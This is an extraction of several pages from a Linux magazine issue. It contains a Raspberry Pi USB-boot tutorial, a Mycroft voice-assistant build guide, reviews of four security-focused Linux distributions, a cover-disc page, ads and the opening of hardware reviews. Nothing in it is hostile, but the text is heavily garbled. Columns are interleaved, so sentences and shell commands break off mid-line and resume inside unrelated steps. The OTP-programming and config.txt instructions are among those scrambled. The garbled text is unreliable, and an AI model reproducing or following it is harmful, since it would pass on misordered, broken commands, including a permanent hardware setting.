4GB-8GB to upwards of 500GB. A further benefit is that
the robustness and reliability of a USB storage device
is far greater than an SD card, so this increases the
04 Write the OS to the USB device
We now need to write the same Raspbian OS
image to your USB storage device. You can use the same
longevity of your data. .img image that you downloaded in step two. Ensure that
Before you begin, please note that this setup is you have ejected the SD card and load Etcher. Attach the
still experimental and is developing all the time. Bear USB storage and once loaded, select the relevant drive
in mind too that it doesn’t work with all USB mass- from the Etcher menu. Drag the .img image file across
storage devices; you can learn more about why and view as you did in step four. While that’s writing, place the SD
compatible devices at www.raspberrypi.org/blog/pi-3- card into you Raspberry Pi and boot it up ready for the
booting-part-i-usb-mass-storage-boot. next step.

01 How it works
This setup involves booting the Raspberry Pi
from the SD card and then altering the config.txt file
in order to set the option to enable USB boot mode. This
in turn changes a setting in the One Time Programmable
(OTP) memory in the Raspberry Pi’s system-on-a-chip,
and enables booting from a USB device. Once set you can
remove the SD card for good. Please note that that any
changes you make to the OTP are permanent, so ensure
that you use a suitable Raspberry Pi – for example, one
that you know will always be able to be hooked up to the
USB drive rather than one you might take on the road.

74
05 What’s new
With the release of the new Raspberry Pi 3 B+
the operating system was also updated. This features
an upgraded version of Thonny, the Python editor, as
well as PepperFlash player and Pygame Zero version
1.2. There’s also extended support for larger screens.
To use that, from the main menu select the Raspberry vcgencmd otp_dump | grep 17 then press Enter. If the
Pi configuration option. Navigate to the System tab and OTP has been programmed successfully, 17:3020000a will
locate the ‘Pixel Doubling’ option. This option draws be displayed in the Terminal. If it’s any different, return to
every pixel on the desktop as a 2x2 block of pixels, which step 7 and re-enter the line of code.
makes everything twice the size. This setting works well
with larger screens and HiDPI displays.
09 Boot from the USB storage device
This completes the configuration of the OTP.

06 Configure the Wi-Fi


With the latest OS update, Wi-Fi is disabled until
the ‘regulatory domain’ is set. This basically means that
Shut down your Raspberry Pi and remove the SD card,
which is no longer needed. Take the USB device you
prepared in step 4 and insert it into one of the USB ports.
you have to specify your location (in terms of country) Add the power supply and after a few seconds your
before your Wi-Fi becomes available. Open the main Raspberry Pi will begin booting up. If you have a display
connected you’ll see the familiar rainbow splash screen
appear. Note that the boot-up time may be slower than
using an SD card – this depends on the type and speed
of the USB drive you’re using. However, once the Pi has
completed booting up it will run at the usual speed.

10 Reusing the SD card


At some point in the future you will probably
want to reuse the SD card that was used to set up the
menu and scroll to Raspberry Pi Configuration settings, USB device. To do this you simply need to remove the line
then select the ‘Localisation’ tab and then ‘Set WiFi program_usb_boot_mode=1 line from config.txt so that
Country’. Scroll down the list and select your relevant the Raspberry Pi boots from the SD card. Since you can’t
country for your current location. now use this SD card to boot up the Pi you’ve just altered,
you’ll first need to insert the card into your main PC –

07 Configure the USB boot mode


In order to boot your Raspberry Pi from the USB
device, you need to alter the config.txt file to stipulate
don’t use it yet with a different Pi if you have one, as when
that one boots up, it too will be set to start from USB!
Open the Terminal window and then open the config.
that future boots happen from the USB. Open the txt file: sudo nano /boot/config.txt. Scroll down and
Terminal window and type echo program_usb_boot_ locate the line of text program_usb_boot_mode=1 and
mode=1 | sudo tee -a /boot/config.txt. This adds either delete it or comment it out. You can now use this
SD card in another Raspberry Pi.

The PoE HAT


The official Raspberry Pi PoE (Power over Ethernet)
HAT is also now available. This new add-on board
the line program_usb_boot_mode=1 to the end of /boot/ is designed for the 3 B+ model and enables the
config.txt. This sets the OTP (One Time Programmable) Raspberry Pi to be powered via a power-enabled
memory in the Raspberry Pi’s SoC to enable booting from Ethernet network. It features 802.3af PoE, a fully
the USB device. Remember that this change you make to isolated switched-mode power supply, 37–57V DC,
the OTP is permanent and can’t be undone. a 25mm x 25mm brushless fan for processor cooling
and fan control. Could this signal a move towards the

08 Check the configuration


Once you’ve edited the config file, type sudo
reboot to reboot your Raspberry Pi. The next step is to
Raspberry Pi being embedded in more IoT devices?
You can purchase the PoE HAT from https://www.
raspberrypi.org/products/poe-hat – at the time of
check that the OTP has been programmed correctly. Open writing, price was to be determined.
the Terminal window and enter the following:

www.linuxuser.co.uk 75
Tutorial Mycroft: DIY voice assistant

Make an open source voice


assistant with Mycroft
Forget Cortana, Alexa, Google Home and Siri – we’re
Calvin
Robinson going open source and creating our own voice assistant
Calvin is Director
of Computing &
IT Strategy at an
all-through school
in northwest
London.

Resources
Mycroft
https://mycroft.ai/
get-mycroft

Raspberry Pi 3

microSD card,
8GB or larger

USB microphone

Speakers

Etcher
https://etcher.io
Above Mycroft Mark II, expected in December this year, looks like being an impressive piece of hardware

Voice assistants are all the rage at the moment, what


with Microsoft’s Cortana, Apple’s Siri, Google’s Home
and Amazon’s Alexa all entering the market. Users
are becoming more comfortable talking to a device and
receiving audible instructions, in a way that’s not too
dissimilar from the computer in the Star Trek franchise.
However, with current concerns regarding privacy, it’s
important to know what data is collected, where it’s
going, and who could potentially be eavesdropping on
your conversations.
We don’t mean to sound paranoid, but if you’ve got
an open mic in your environment it’s pretty important
to know where any data might be heading; some of the
larger corporations collect information about users to
01 Download and flash
There are Linux (Arch, Fedora and Ubuntu/
Debian) and Android versions of Mycroft available, but for
better target advertisements towards them. That’s why this tutorial we’re sticking with the Raspberry Pi flavour.
users are turning to open source alternatives. Last issue We recommend you use a Pi 3.
we interviewed John Montgomery, the CEO of Mycroft AI, Download the latest version of Picroft from the link
who has set out to address this problem. This issue we’re in our Resources section, as well as Etcher. Other than
having a go at building one of these units for ourselves, any potential ‘Skills’ you want to add later on and that
armed only with a Raspberry Pi, a USB microphone and should be all you need to download for this tutorial.
some speakers. Etcher is an imaging program which we’ll use to burn or

76
flash the downloaded Picroft image to an SD card. Plug Now that we’ve paired with Mycroft.ai, we can go to
your microSD card into your computer, launch Etcher and the Settings menu where you can select a male or female
select the Picroft image. Then flash it! voice, the style of measurement units you want to use,
and your preferred time/date formats.

02 Set it up
Plug your microSD card back into your Raspberry
Pi and connect it to a power source. The easiest way to
If you’re concerned about privacy, you may want to
keep the Open Dataset box unticked. Keep in mind,
though, that selecting this option is a good way of
get everything working is to connect your Pi to the local contributing useful data to the open source project and
network via the Ethernet port. If you do need to use thus improving the performance of Mycroft in the future,
Wi-Fi, look out for an SSID called MYCROFT; the default assuming your voice assistant isn’t in a particularly
password is 12345678. confidential environment.
Once everything is connected, you’ll want to either
plug in a monitor and keyboard, or connect via SSH to
do this headlessly. Whether via Ethernet or Wi-Fi, once
your device is connected you’ll need to visit http://home.
mycroft.ai to start the setup process. You’ll need to
sign in with Google, Facebook or GitHub, or create a new
Mycroft account; given that part of the reason for this
project is to protect your data from being shared with big
corporations, the latter might be advisable!

03 Find your Raspberry Pi


To date, all Raspberry Pi devices start with a
MAC address of B8:27:EB, so we can use this to scan our
network for the Pi, if we don’t have a monitor/keyboard to
connect to it. You could use nmap, for example:

sudo nmap -sP 192.168.1.0/24 | awk '/^Nmap/


{ip=$NF}/B8:27:EB/{print ip}'
06 Advanced settings
In Advanced Settings, we can really begin to
personalise our Mycroft experience. There are a number
of pre-programmed wake words, but you can set your
You can also use arp: own custom version – perhaps ‘Computer’ a la Star Trek,
or maybe ‘Butler’ if you’re feeling particularly bourgeoisie.
$ arp -na | grep -i b8:27:eb You’ll need to set the phonetic version of your wake
word too, so the device understands what it’s listening
If your home network is not on the 192.168.1.* subnet, out for. An example would be ‘HH EY . B AH T L ER .’ for
change the command line accordingly. “Hey Butler”. You’ll probably want to include some kind
of exclamation or greeting before your wake word to

04 Connect to Picroft
SSH into your Picroft and you’ll be taken straight
into the Mycroft CLI screen. Usually, this is quite useful,
avoid confusing the Picroft. This is almost certainly why
“Hey Google” or “Okay Google” are used on Google Home,
rather than just “Google”; it’s to avoid said devices picking
but while we get things set up we want to exit that screen up on random conversations, something which happened
using Ctrl+C to reach a normal command prompt. Here quite a lot in our testing.
you’ll want to do some basic setting-up. First, change You can also switch the text-to-speech engine from
the password: type passwd and follow the prompts. Then Mycroft’s Minic engine to Google’s own. This will change
change the Wi-Fi network settings: the voice you hear to that of Google Home, which is
arguably much smoother.
sudo nano /etc/wpa_supplicant/wpa_supplicant.
conf

Change the network name and/or password in this config


file, then press Ctrl+X to exit and save the file. Then type
sudo reboot to reload your Picroft.

05 Add your device to Mycroft.ai


Back in your browser at home.mycroft.ai,
click ‘Add Device’ and you’ll be asked for a name and 07 Using the Picroft CLI
Now that everything is set up, you should have
location for your Picroft device. You’ll also be asked for a a basic voice assistant raring to go. Call out the wake
registration code; if you turn on the speakers connected word and issue a few commands to get started – Mycroft
to your device you’ll notice the Picroft is reading this out understands all these examples by default:
to you already, until the device is paired up. Hey Butler, what time is it?

www.linuxuser.co.uk 77
Tutorial Mycroft: DIY voice assistant

Mycroft,
send help
Hey Butler, set an alarm for X am.
Hey Butler, record this.
Hey Butler, what is [insert search term].
09 Play music
The only officially supported music-playing app
seems to be mopidy, which we had great difficulty in
Hey Butler, tell me a joke. getting working. Hours of fiddling with dependencies and
Hey Butler, go to sleep. an extended deadline later, we still had no luck. However,
There’s an active Hey Butler, read the news. we did find spotify-skill in the GitHub repository, which
community on Hey Butler, set a reminder. works a treat.
GitHub ready to help Hey Butler, do I have any reminders? Simply by copying the GitHub URL (https://github.com/
with help requests, Hey Butler, increase/decrease volume forslund/spotify-skill) into the ‘Skill URL’ box on Mycroft.
which will come in Hey Butler, what’s the weather like? ai and ticking ‘Automatic Install’, moments later we had
handy as Picroft a new menu option to input our Spotify details. Then
spits out quite a few You can also skip our earlier step of using nmap or arp “Hey Mycroft, Play Spotify” loads up our most recent
Python 2.7 errors by asking “Hey Butler, what is my IP address?”. playlist. The only problem was that we couldn’t figure
when Skills refuse to out a way to stream directly to the Mycroft; spotify-skill
load properly… only streams music to another Spotify Connect device.
It’s only speculation on our part, but we assume this is
something to do with licensing restrictions for ‘official’
Spotify devices.

10 Play podcasts and radio


Thankfully, it’s much easier to stream podcasts
than it is stream music. A quick “install podcast skill”
install the necessary Skill, and you’ll then have options on
Mycroft.ai for your three favourite podcast feeds. Paste
in the RSS details and you’re good to go. “Hey Mycroft,
play x podcast” should then do the trick.
We didn’t have as much luck with the Internet Radio
Skill, though. Requesting any Internet Radio stations

08 Adding Skills
Of course, the default abilities are all well and
good, but surely where an open source program comes
threw up PHP errors, which are visible in the Picroft
command line interface and log viewer. It seems as if
Skills are very hit-and-miss at the moment. There is a
into its own is with customisation. Mycroft/Picroft is no ‘status’ column for each one on the community page
different in this regard, with a whole range of different which is meant to indicate its readiness, but we found the
voice abilities available. These seem to have been coined results to be inconsistent.
‘Skills’ – we can thank Amazon for that.
Back at Mycroft.ai, it’s time to explore the Skills menu.
There’s an option to paste a GitHub URL to install a Skill,
which is quite useful, but Mycroft does also recognise
“install [name of Skill]” as a command. You’ll see a link to
a list of community-developed Skills, where you can also
find the names and command needed to install them.
“install YouTube” adds a simple YouTube streaming Skill,
for example.

78
11 Replacing commercial voice assistants
While the Picroft has been a fun experiment to
sink (way too many) hours into, do we think it’s ready for
prime time? In a word: no. While the core experience may
be fine, it’s extremely limited and the Skills are not yet up
to scratch. In our experience, they’re just not very likely to
work, even after hours of fiddling.
If you’re looking for a new hobby and don’t mind putting
a few days into this, you’ll get some enjoyment out of it.
However, if you’re looking for a new voice assistant to
read you the news, wake you up and play your favourite
music or radio station, we’re still forced to recommend
one of the commercial units. Having said that, Mycroft
Mark II is available to reserve on IndiGogo right now too.

12 Testing
It may be that Mycroft’s voice recognition isn’t up
to scratch, or it may be that the microphone we used for
testing was cheap and useless, but constantly issuing
commands via voice during the testing process proved
to be tiring. Fortunately, Mycroft supports text-based
commands, too.
If you SSH into your Picroft you can type text
commands directly into the command-line interface. If Above Mycroft Mark I
you exit out of the CLI, there are a number of command Other versions of Mycroft comes with speakers
prompts available: At the moment Mycroft is available in several and mic built-in
mycroft-cli-client A command line client, useful flavours. The version we’re looking at here,
for debugging technically known as Picroft, consists of the
msm Mycroft Skills Manager, to install new Skills free software only – you’ll need to add your own
say_to_mycroft Use one-shot commands via the Raspberry Pi to run it, plus speakers and a mic.
command line If you prefer an off-the-shelf version, you can opt
speak Say something to the user for the Mycroft Mark I ($180), a standalone hardware
test_microphone Record a sample and then play it back device which is equally ‘hackable’ in terms of adding
to test your microphone. abilities or changing code. Finally, there’s Mycroft for
Linux, which you need to install using either a shell

13 Becoming a supporter
Mycroft offers an optional subscription service,
at $1.99 per month or $19.99 for a year. While the
script or a standalone installer. Mycroft AI describes
this as “strictly for geeks”.

primary purpose of these subscriptions is to support the


development team, there are exclusive updates which are There are the benefits of being able to jump into the
made available only to subscribers. code and have a play-around, or just to check that your
As of May 2017 there’s a new female voice available data really isn’t going anywhere. But you have to balance
only to supporters. There was also a Group Hangout that against the inability to find a working Skill when, for
session with John Montgomery himself in April. The example, you just want to stream some music. When we
missions statement reads: did manage to get a stream working, Mycroft would talk
“It’s hard to overstate how much I value your support all over the audio stream, with false positives of the wake
Calvin Robinson. It allows my team to make me grow, word being picked up.
and become better, faster, stronger. Your contribution If you’re a hobbyist looking for a new project to sink
takes us all closer to the ultimate goal of creating a your teeth into, Mycroft might be right up your street. If
general purpose artificial intelligence, which is open for you just want a device that you can say “Play the Beatles”
everyone.” to, without getting out of bed, this might not be the right
setup for you right now. That’s not to say it won’t ever be,

14 So, is it worth it?


There are lots of pros and cons to a setup like
this. There’s the freedom of being able to create your own
with the community and Skills growing at a rapid pace –
and with the very promising Mark II version on the way,
who’s to say what Mycroft might be in a years’ time? At
Skills, or to find them in the brilliant online community. the moment, though, it’s lacking commercial viability.

www.linuxuser.co.uk 79
Not your average technology website

EXPLORE NEW WORLDS OF TECHNOLOGY


GADGETS, SCIENCE, DESIGN AND MORE
Fascinating reports from the bleeding edge of tech
Innovations, culture and geek culture explored
Join the UK’s leading online tech community

www.gizmodo.co.uk
twitter.com/GizmodoUK facebook.com/GizmodoUK
81 Group test | 86 Hardware | 88 Distro | 90 Free software

Kodachi Linux Qubes OS

Subgraph OS Whonix

Group test

Security distributions
Use one of these specialised builds that go one step further than
your favourite distribution’s security policies and mechanisms

Kodachi Linux Qubes OS Subgraph OS Whonix


This Debian-based project aims Endorsed by Edward Snowden, This is another distribution on This Debian-based distribution
to equip users with a secure, Qubes enables you to Snowden’s watchlist. Subgraph is unlike any of its peers that
anti-forensic and anonymous compartmentalise different is a relatively new project that install and run atop physical
distribution. It uses a customised aspects of your digital life into works its magic by building hardware. Whonix is available as
Xfce desktop in order to be securely isolated compartments. sandbox containers around a couple of virtual machines that
resource-efficient and claims The project makes intelligent use potentially risky apps such can run over KVM, VirtualBox
to give users access to a wide of virtualisation to ensure that as web browsers. Despite its and even Qubes OS. This unique
variety of security and privacy malicious software is restricted stability its developers are calling arrangement of virtual machines
tools while still being intuitive. to the compromised environment. it an alpha release. also helps ensure your privacy.
www.digi77.com/linux-kodachi www.qubes-os.org https://subgraph.com www.whonix.org

www.linuxuser.co.uk 81
Review Security distributions

Kodachi Linux Qubes OS


A reasonably secure distribution – Ensures maximum security and
easy to use but difficult to install privacy, but at the price of usability

n Kodachi enables you to use your own VPN instead of Kodachi’s and will n Qubes OS has an easy to follow installer, but it is a complicated distro
ban users who misuse their VPN for things such as hosting illegal torrents and you need to learn the ropes. (See LU&D189 p60 for a detailed guide.)

How is it secure? How is it secure?


Unlike some of the other distros, Kodachi doesn’t use a hardened Qubes divides the computer into a series of virtual domains called
kernel. However the kernel is patched against several denial of qubes. Apps are restricted within their own qubes, so you run
service and information leak vulnerabilities, and also the major Firefox in one to visit untrusted websites and another instance of
privilege escalation vulnerability Dirty COW. It also includes Firejail to the browser in a different qube for online banking. A malware ridden
run common applications inside sandboxed environments. website in the untrusted qube will not affect the banking session.

What about anonymity? What about anonymity?


Kodachi routes all connections to the internet through a VPN before Qubes is geared more towards security rather than privacy and
passing them to the Tor network. It also bundles a collection of tools anonymity, and therefore doesn’t include any specific software or
to easily change identifying information such as the Tor exit country. integrated processes to hide your identity. In fact, if you care about
Additionally, the distribution encrypts the connection to the DNS privacy as well as security, Qubes’ developers suggest running
resolver and includes well-known cryptographic and privacy tools to Whonix on top of a Qubes installation to get the best of both worlds –
encrypt offline files, emails and instant messaging. though obviously performance will suffer.

Useful as a desktop? Useful as a desktop?


The distro is loaded to the brim with apps that cater to all kinds of Qubes functions pretty much like any Fedora-based distribution, but
users. Kodachi includes all the apps you’ll find on a regular desktop you’ll need to familiarise yourself with its peculiarities. For example,
distribution and then some. Its hefty 2.2GB Live image includes VLC, you can add additional apps with dnf or a graphical app but you’ll
Audacity, LibreOffice, VirtualBox, KeepassX, VeraCrypt and more. need to make sure you do this within TemplateVM. If you aren’t
There’s also the Synaptic package manager for additional apps. careful you’ll end up negating Qubes’ security advantages.

Installation and setup Installation and setup


This isn’t one of the distribution’s strong suits. Kodachi uses the Qubes is available as an install-only medium. The project developers
Refracta installer to help anchor the distro. However the installer don’t recommend installation on a dual-boot computer, nor inside a
is very rudimentary; for instance, it uses GParted for partitioning virtual machine such as VirtualBox. It uses a customised Anaconda
the disk. You also can’t change the default username because then installer which is a breeze to navigate. However, if your graphics
many of the custom scripts won’t function post-installation – not hardware isn’t detected the installer falls back to the command-line
something we’d expect to see. installer which has a well-known bug that prevents installation.

Overall Overall

8 7
Kodachi uses Firejail to sandbox apps and isn’t Qubes compartmentalises the entire Linux
very easy to install. But its collection of privacy- installation into Xen-powered virtual domains.
centred tools and utilities that help you remain This arrangement ensures that a compromised app
anonymous when online is unparalleled. doesn’t bring down the entire installation.

82
Subgraph OS Whonix
Manages to successfully tread the A ready-to-use OS that’s available as
line between usability and security two KDE-powered virtual machines

n You can use the intuitive Subgraph Firewall to monitor and filter n The iptables rules on the Whonix-Workstation force it to only connect to
outgoing connections from individual apps the virtual internet LAN and redirect all traffic to the Whonix-Gateway

How is it secure? How is it secure?


Subgraph ships with a kernel hardened with the PaX set of patches Built on the concept of security by isolation, Whonix comes in the
from the Grsecurity project that make both the kernel and the form of two virtual machines. The idea behind this is to isolate the
userland less exploitable. The distribution also forces users to environment you work in from the internet access point. On top of this,
encrypt their filesystem. To top it off, Subgraph runs many desktop Whonix routes all internet traffic through Tor. Thanks to this, even if
applications inside the Oz security sandbox to limit the risks. one of the machines is compromised, it wouldn’t affect the other.

What about anonymity? What about anonymity?


The distro anonymises all your internet traffic by routing it via Whonix uses Tor to hide your IP address and circumvent censorship.
the Tor network. It also uses the anonymous, peer-to-peer file The distribution also bundles the anonymous peer-to-peer instant
sharing application OnionShare. Then there’s Subgraph Firewall, messenger Ricochet and the privacy-friendly email client combo of
which applies filtering policies to outgoing connections on a Thunderbird and TorBirdy. Whonix doesn’t includes Tor by default, but
per-application basis and is useful for monitoring unexpected there’s a script to download a version from a list of stable, new and
connections from applications. hardened releases.

Useful as a desktop? Useful as a desktop?


Subgraph includes a handful of mainstream apps for daily desktop Whonix doesn’t include LibreOffice but does have VLC. There’s also
use, such as LibreOffice and VLC. On Subgraph these come wrapped KGpg for managing keys, and many of its applications are tuned for
by the sandboxing system Oz for added privacy protection. The privacy. The distro has a bunch of repos and you’ll have to choose one
distribution is also configured to fetch packages from its own custom while setting it up. It doesn’t include a graphical package manager,
repository and that of Debian Stretch. but you can use the WhonixCheck script to search for updates.

Installation and setup Installation and setup


Subgraph uses a modified Debian installer to help you set up There’s no installation mechanism for Whonix. Instead, the project’s
encrypted LVM volumes during installation. The distribution website offers several deployments mechanisms, the most
establishes a connection to the Tor network as soon as it’s convenient of which is to grab the VMs that work with VirtualBox.
connected to the internet – but it doesn’t include the Tor browser by At first launch, both VMs take you through a brief setup wizard to
default, which is automatically downloaded when launched for the familiarise you with the project and to set up some components,
first time. such as the repository.

Overall Overall

8 8
Subgraph goes to great lengths to ensure Whonix is a desktop distro that’s available as two
everything from the kernel to the userland utilities separate VMs. It ensures security and privacy
aren’t exploitable. It also bundles a host of privacy- by using a virtualisation app to isolate the work
centred apps along with mainstream desktop apps. environment from the one that faces the internet.

www.linuxuser.co.uk 83
Review Security distributions

In brief: compare and contrast our verdicts


Kodachi Linux Qubes OS Subgraph OS Whonix
How is it Uses a patched kernel Uses Xen to divide the Includes a hardened Isolates the internet
secure? instead of a hardened
one and sandboxes
apps with Firejail
8 desktop and apps into
virtual ‘qubes’ that are
isolated from each other
9 kernel and runs many
common apps inside
a security sandbox
9 gateway from the
workstation in which
you run your apps
8
What about Routes all connections Its architecture ensures Routes all traffic through Routes all traffic via Tor
anonymity? to the internet first via a
VPN and then through
the Tor browser
9 a certain level of privacy
but that’s not intended to
be its forte
5 Tor and comes bundled
with a host of privacy-
centred apps
9 and includes a good
many useful privacy
apps and utilities
8
Useful as a The Xfce desktop is It operates like any other Bundles a few Its KDE desktop is
desktop? loaded with marquee
open source apps for
all kinds of users
9 Fedora installation, so
long as you adhere to its
specific nuances
6 mainstream apps but
can be fleshed out via its
own and Debian’s repos
8 limited and you’ll need
to add extra apps from
the command line
7
Installation Uses the rudimentary Install-only distribution Uses a modified Debian Ships as two VMs that
and setup Refracta installer
which is Kodachi’s
weakest aspect.
5 that uses a modified
but easy-to-operate
Anaconda installer
8 installer and doesn’t
require much setting
up before use
8 you simply import
into an app such as
VirtualBox and boot
9
Overall Uses Firejail to secure Ensures compromised Provides a secure An easy-to-deploy
its collection of apps
but is cumbersome
to install
8 applications don’t
make the entire distro
installation vulnerable
7 environment with a
collection of apps to
safeguard your privacy
8 distribution that uses
virtualisation to ensure
security and privacy
8
And the Winner Is…
Qubes OS
There’s very little to choose between the
contenders, with all of them doing their bit
to protect users from vulnerabilities and
exploits. Linux Kodachi and Subgraph OS
are pretty similar in that both use sandboxed
environments to isolate applications from
each other and limit their footprint on a
system, which makes them some of the best
means to shield your data. Both projects also
make good use of the Tor network to help
their users remain anonymous online.
The main reasons for Kodachi’s elimination
are that it doesn’t use a hardened kernel and
it isn’t easy to install. These problems don’t
exist in the Snowden-endorsed Subgraph,
which is steered by a team of developers with
a proven track record of developing security- n Open unfamiliar files in a DisposableVM to make sure they don’t compromise the rest of the
centred apps.
Subgraph also doesn’t have the same This leaves us with Whonix and Qubes. readers will understand that effective
steep learning curve as some of its peers and Whonix is more geared towards privacy, while security is an involved process and won’t shy
offers far better protection than a regular Qubes is designed to be a comprehensive away from putting in the effort required to
desktop distribution. However, many security secure OS. They are the two most innovative set up Qubes. Additionally, you can install the
engineers have pointed out security and and technically superior options of the Whonix Template on Qubes OS – and you can
privacy leaks that make it less secure than lot, though at the same time are also the always check our Qubes feature (see p60,
our winner. Even its developers accept that most cumbersome and resource intensive Features, LU&D189) to get to grips with it.
Subgraph needs improvements. to deploy and operate. But regular LU&D Mayank Sharma

84
Never miss an issue US offer

special usa offer OFFER ENDS


june 30
2018!

*
& get 6 issues free
FREE DVD TRY 2 UBUNTU SPINS
www.linuxuser.co.uk
LINUX USER & DEVELOPER ISSUE 186

THE ESSENTIAL MAGAZINE


FOR THE GNU GENERATION

ULTIMATE

RESCUE & resources!


REPAIR KIT for
ULTIMATE RESCUE & REPAIR KIT

• Digital forensics • Data recovery • File system


repair • Partitioning & cloning • Security analysis

INTERVIEW
subscribers
Vivaldi
The web browser for IN-DEPTH GUIDE
Linux power users The future of
programming
The hot languages
to learn
PRACTICAL PI
Build an AI assistant
Python & SQLite PAGES OF
Micro robots! GUIDES
> MQTT: Master the IoT protocol
> Security: Intercept HTTPS
www.linuxuser.co.uk

> Essential Linux: The joy of Sed

Pop!_OS Get into Arch Linux ALSO INSIDE


» iStorage DiskAshur Pro2
ISSUE
ISSUE177
186 PRINTED
PRINTEDININ
THE
THE
UKUK£6.49
£6.49

The distro for creators, 4 Linux distributions for » Java: Spring Framework
developers and makers entering the world of Arch » Disaster relief Wi-Fi

LUD186.cover.indd 1 29/11/2017 15:10


DE

DIsTros & foss


plvUAETA

Install today!
usn 2
b

ubuntu Mate 18.04 (beta 2)


Sample a modern take on the

ubuntu Mate
traditional desktop metaphor
ContaIners
.0

today! Built on the solid


foundations of the latest ubuntu
18.04 ltS, this benefits from
february’s new release of Mate
1.20 which now has Hidpi support
for crisper, more detailed images.
MX linux 17.1 all the tutorial code
a middleweight distro using if you dived straight into our control
a custom Xfce desktop which containers feature (on p18), you’ll
packs an excellent selection of want to grab our example scripts,
administrative utilities into its dockerfiles, ansible playbook
MX tools dashboard. samples and puppet manifests. in
computer Security this issue, we
devuan 2.0 asCII (beta) look at privilege escalation, which
an incredibly solid beta of the is something of an art – and we’ve
next edition of devuan, the distro included a few tools of the trade,
without systemd. comes with a including Vulners Scanner for
new login and device file manager. sniffing out vulnerable packages. beta 2
+ all tutorial code All the power of Ubuntu + MATE’s traditional
Disclaimer
In no event will Future Publishing Limited
Contact
Future Publishing
Please note
This DVD autoboots to a menu,
desktop experience + enhanced HiDPI support
accept liability or be held responsible for any Quay House so simply insert the disc and

plus powerful new oS


damage, disruption and/or loss to data or
The Ambury reboot your PC. Please ensure
systems as a result of using this disc. Future
Publishing Limited makes every effort to ensure
Bath your DVD drive is set to boot
that this disc is delivered to you free from BANES, BA1 1UA before your hard drive. Consult

MX lInuX 17.1
viruses and spyware. We do still recommend % +44 (0)1225 442244 your PC manufacturer’s
that you run a virus checker over this disc Website: www.linuxuser.co.uk instructions. Thanks for
before use. Future Publishing Limited cannot Subscriptions supporting Future Publishing.
guarantee that at the time of use, hyperlinks Subscribe to Linux User & Developer today! 2018 Future Publishing Ltd.
direct to that same intended content, as Future
Publishing has no control over the content % UK 0844 249 0282
free with
delivered by these hyperlinks. Unless otherwise Overseas +44 1795 419161
issue 191
Email: [email protected]
stated, all software on this disc is distributed
in accordance with the GNU General Public 6-issue subscription (UK) – £32 a fast, friendly and stable linux distribution
13-issue subscription (Europe) – €88
License. For more information on the GNU GPL
loaded with an exceptional bundle of tools
THE MAgAzInE for
THE Gnu GeneratIon

please visit www.gnu.org/licenses/gpl-3.0.txt. 13-issue subscription (World) – $112

LUD191.dvd_wallet.indd 1 06/04/2018 09:57

order online & save


www.myfavouritemagazines.co.uk/sublud
OR CALL 0344 848 2852
* This is a US subscription offer. ‘6 issues free’ refers to the USA newsstand price of $16.99 for 13 issues being $220.87, compared to $112.23 for a subscription. You will
receive 13 issues in a year. You can write us or call us to cancel your subscription within 14 days of purchase. Payment is non-refundable after the 14 day cancellation
period unless exceptional circumstances apply. Your statutory rights are not affected. Prices correct at point of print and subject to change. Full details of the Direct
Debit guarantee are available upon request. UK calls cost the same as other standard fixed line numbers (starting 01 or 02) included as part of any inclusive or free
minutes allowances (if offered by your phone tariff). For full terms and conditions please visit bit.ly/magtandc. Offer ends June 30 2018.
Review TerraMaster F4-420 NAS & Trendnet TEW-817DTR

Pros
Offers a strong enclosure,
easy installation and a
powerful platform that’s
quiet in operation.

Cons
No drive locks supplied
and a combination of
limited application
selection and generally
poor app support.

Summary
Solid enough
construction and
hardware design
(if you like rounded
silver surfaces) can’t

TerraMaster
overcome the lack of
attention given to the
operating system and
applications. Poor docs,
limited apps and CPU
Hardware power that is

7
difficult to use are

TerraMaster F4-420 NAS


all issues here.

Powerful NAS hardware that deserves better


software development, documentation and support
Price The TerraMaster is a NAS solution with four it involves downloading a Java-based desktop
£400 ($460) vertically mounted 3.5-inch drive bays (without app, searching for the NAS on your network and
Website locks) on the front. At the back are two USB ports updating TerraMaster Operating System (TOS) 3.1, a
www.terra-master.com/uk – one USB 3.0 and one USB 2.0 – and two gigabit Linux-based OS. The documentation could do with
Specs Ethernet LAN ports. There are also two 80mm fans a refresh and updating TOS can be slow, but once
CPU Intel Celeron J1900 2GHz at the rear and power input for a laptop-style PSU. up and rolling this NAS box works well, although
RAM 4GB DDR3 If you have four 12TB hard drives handy, there is it has to be said this isn’t anything special from a
Drive bays 4 the potential for 48TB of storage, but only if you’re functionality standpoint.
Compatible drives 4x 3.5- willing to lose any form of resilience to drive failure. TOS offers a modest selection of installable apps,
inch or 2.5-inch SATA 6Gb/s, The F4-420 has a quad-core 2GHz Intel Celeron including MySQL Server, Plex Media Server, Sugar
SATA 3Gb/s hard drive or SSD (J1900) and 4GB of DDR3 memory, but the file- CRM, WordPress and Apache Tomcat. The F4-420
Read & Write 220MB/s, serving performance is entirely dependent on also includes rclone for syncing cloud services such
210MB/s having a managed switch with the ability to create as Google and Amazon S3; however, you’ll need to hit
Ports USB 2.0, USB 3.0, 2x channel bonding. Without that, the best speed the terminal and ignore the provided web interface
Ethernet (1000/100/10Mbps) you’ll see, almost regardless of the drives in use, to get it work. Some functionality is pre-installed,
RAID support RAID 0, 1, 5, 6, is 115MB/s read and 110MB/s write. With both such as DLNA, Time Machine, FTP and Rsync, which
10, JBOD, SINGLE Ethernet ports connected to a suitable switch, are configured through the control panel.
Network protocols SMB, those speeds can be doubled – but unless There is very little wrong with the TerraMaster
AFP, NFS, ISCSI, FTP connected PCs have dual LAN networking, the extra hardware – it just needs a better software platform
Size 227 x 225 x 136 mm performance is aggregated across multiple users. to exploit it fully, and an ongoing development cycle
See website for more Getting our review unit operational was to enhance the user experience.
specifications relatively painless on Linux. On the software side, Mark Pickavance

86
Pros
An affordable price for
a wireless router that
is WISP-capable, while
still being being highly
portable for travellers.

Cons
Needs a carry pouch, and
the manufacturer needs
to address the captive
portals restriction for it to
be almost perfect.

Summary
This compact travel
router is inexpensive,
easy to carry and
deploy. It also supports
WISP technology for
Trendnet

those who have a


service agreement with
a provider, allowing
completely independent
Hardware connectivity
in areas with
9
Trendnet TEW-817DTR
coverage.

A portable wireless router for the business traveller


who’s in search of a decent connection
Price Many hotels provide a wired connection in their tested the Trendnet on the ground floor of a modest
£29 ($35) rooms; Trendnet TEW-817DTR is a portable property divided by solid block walls, and the signal
Website device that takes advantage of this, with the remained strong over the whole test location. At
